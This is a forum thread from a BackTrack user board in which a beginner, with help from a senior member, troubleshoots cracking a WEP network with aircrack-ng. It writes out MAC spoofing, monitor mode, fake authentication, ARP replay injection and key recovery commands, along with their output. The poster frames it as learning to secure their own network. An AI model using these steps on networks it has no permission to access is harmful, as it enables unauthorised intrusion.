Results 1 to 7 of 7

Thread: W/L card not injecting but is in supported card list

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default W/L card not injecting but is in supported card list

    Hey Everyone

    Second attempt .. so i cut the convo and just difcuss the issue directly.

    After having some "wireless issues" i decided to look into things a bit deeper in order to learn about how to protect myself. I already learnt one thing. Block the mac address of 00:11:22:33:44:55 So i want to see how someone got into my system. OK ... so i'm using

    Backtrack 3 LiveCD (after spending a few hours doing USB, i found my BIOS didn't allow USB booting .. good lesson for the kiddies
    Wireless card is a Dlink Air Plus Xtreme G DWL-G520 HW:B3 FW:4.30

    OK ... this this is what i do ... and this is what i get back

    Open Shell
    -> airmon-ng
    wifi0 - atheros - madwifi-ng
    ath0 - atheros - madwifi-ng VAP (parent: wifi0)

    -> airmon-ng stop ath0
    wifi0 - atheros - madwifi-ng
    ath0 - atheros - madwifi-ng VAP (parent: wifi0) (VAP Destroyed)

    -> ifconfig wifi0 down (i tried ath0 but i get an error saying no such device) just goes to next prompt

    ->macchanger --mac 00:11:22:33:44:55 wifi0
    Current MAC: 00:13:46:xx:xx:xx
    Faked MAC: 00:11:22:33:44:55

    -> airmon-ng start wifi0
    wifi0 - Atheros - madwifi-ng
    ath0 - Atheros - madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

    ->airodump-ng ath0
    I find my network
    BSSID:00:15:xx:xx:xx:xx PWR:27 Beacons: 23 #data:0 #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP Essid:EBC

    -> airodump-ng -c 6 -w weppy -bssid 00:15:xx:xx:xx:xx ath0
    BSSID:00:15:xx:etc PWR:34 RXQ:100 Beacons:1500 (and counting) #data:70 (and counting slowly) #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP ESSID:EBC

    Opening a new shell leaving the other running i type
    -> aireplay-ng -1 0 -a 00:15:xx:etc -h 00:11:22:33:44:55 -e EBC ath0
    Sending Authtication Request (open System) [ACK]
    Authentication successful
    Sending Association Request [ACK]
    Assoication successful :-) (AID: 1)

    -- ISSUES START HERE --

    -> aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
    Waiting for beacon frame (BSSID 00:15:xx:etc) on channel 6
    Saving ARP requests in replay_arp-1203-020546.cap
    You should also start airodump-ng to capture replies
    Read 2000 (and counting rapidly) packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)

    So this is meant to be the important packet imjection that i read so many others have issues with ....

    now i did the check on my card and it should be working .. but it isn't .. the #data which i expect

    would be going up .. doesn't .. AND i don't get ARP numbers going up ....

    Any suggestions would be lovely ...

    Thanks guys.

    Aiban

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by Aiban View Post
    -- ISSUES START HERE --

    -> aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
    Waiting for beacon frame (BSSID 00:15:xx:etc) on channel 6
    Saving ARP requests in replay_arp-1203-020546.cap
    You should also start airodump-ng to capture replies
    Read 2000 (and counting rapidly) packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)

    So this is meant to be the important packet imjection that i read so many others have issues with ....

    now i did the check on my card and it should be working .. but it isn't .. the #data which i expect

    would be going up .. doesn't .. AND i don't get ARP numbers going up ....

    Any suggestions would be lovely ...

    Thanks guys.

    Aiban
    Is there an active client connected to the AP while you are trying to perform the ARP-replay attack? Generally APs will not broadcast any ARP-requests unless there is at least one client connected.
    -Monkeys are like nature's humans.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    1

    Default

    Try to use wesside-ng instead of what you are doing

  4. #4
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default

    Hey mate - what does this mean

    Try to use wesside-ng instead of what you are doing

    In place of where? I'm in noobie area cause i'm just following other guides and my knowledge of backtrack doesn't extend beyond those tutes borders.

  5. #5
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by Aiban View Post
    Hey mate - what does this mean

    Try to use wesside-ng instead of what you are doing

    In place of where? I'm in noobie area cause i'm just following other guides and my knowledge of backtrack doesn't extend beyond those tutes borders.
    Wesside-ng is an automated tool/script for cracking WEP, that being said I have tried it a few times but prefer the manual approach.
    Quote Originally Posted by Aiban View Post
    It reads the packets .. and after a short wait, it said i got 1 ARP and the ACK and sent starting moving like crazy. witht he pps shifting from 499/500
    BUT ... every few seconds i would get this message
    "Notice: got a deauth/disassoc packet. Is the source MAC associated ?

    Very slowly .. i got a few more ARP requests ... but only about 5 in 15 minutes.

    The other console screen shows the #data rapidly rising and at 30000 i used the
    -> aircrack -n 64 -b 00:15:xx:etc weppy-01.cap
    I failed after a minute and tells me it'll retry at another 5000 ivs - it has been going and well past 65000 on the next attempt before i aborted.

    I'm not sure what this deauth means, i don't know how to get the ARP higher which i assume is a goal to success, but i'm using the internet on the laptop trying to excite the wireless... multiple tabs open, downloads but ARPS are slow and this deauth notice fills my screen.
    The error output you get means that you have been disassociated from the AP, which means that it will no longer accept the packets you inject. This is the reason why you notice that the IVs stop climbing as the AP will disregard your injected packets and not give you any response. The fix is however simple, just perform the fake authentication attack again each time this happens (aireplay-ng -1 0...), also make sure that you did not miss this step in the first place. The goal is not to get the ARP count to climb, actually you can crack WEP without ever obtaining a single ARP-request, what you want is for the #data (IVs) count to climb.

    Furthermore, you are using the -n 64 mode in aircrack-ng which mean that if the key isn't actually 64 bits long you will never find it regardless of the amount of packets you collect.
    -Monkeys are like nature's humans.

  6. #6
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default

    OK .. i can fix that .. probably ... but it's the only wireless machine i have .. but i got parts to build a quick system and dump some crappy netgear card i have lying around into it for the sake of this test.. but it is alot of mucking around (i don't have enough monitors etc so it'll be fun to try hahahah so i hope that this is correct (i'm not doubting of course lol ... but thanks .. i'll give that a go

  7. #7
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Default

    OK ... after some scrambling .. i got a laptop to borrow from a friend .
    I set it up to use my Wireless - and this is what happens....

    aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0

    I started some web browsing and a free 1gb download from my ISPs homepage to make sure there was a constant flow of information.

    It reads the packets .. and after a short wait, it said i got 1 ARP and the ACK and sent starting moving like crazy. witht he pps shifting from 499/500
    BUT ... every few seconds i would get this message
    "Notice: got a deauth/disassoc packet. Is the source MAC associated ?

    Very slowly .. i got a few more ARP requests ... but only about 5 in 15 minutes.

    The other console screen shows the #data rapidly rising and at 30000 i used the
    -> aircrack -n 64 -b 00:15:xx:etc weppy-01.cap
    I failed after a minute and tells me it'll retry at another 5000 ivs - it has been going and well past 65000 on the next attempt before i aborted.

    I'm not sure what this deauth means, i don't know how to get the ARP higher which i assume is a goal to success, but i'm using the internet on the laptop trying to excite the wireless... multiple tabs open, downloads but ARPS are slow and this deauth notice fills my screen.

    Thanks for the help so far, it has pushed me further into this ... but need more pushing..

    Thankyou

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •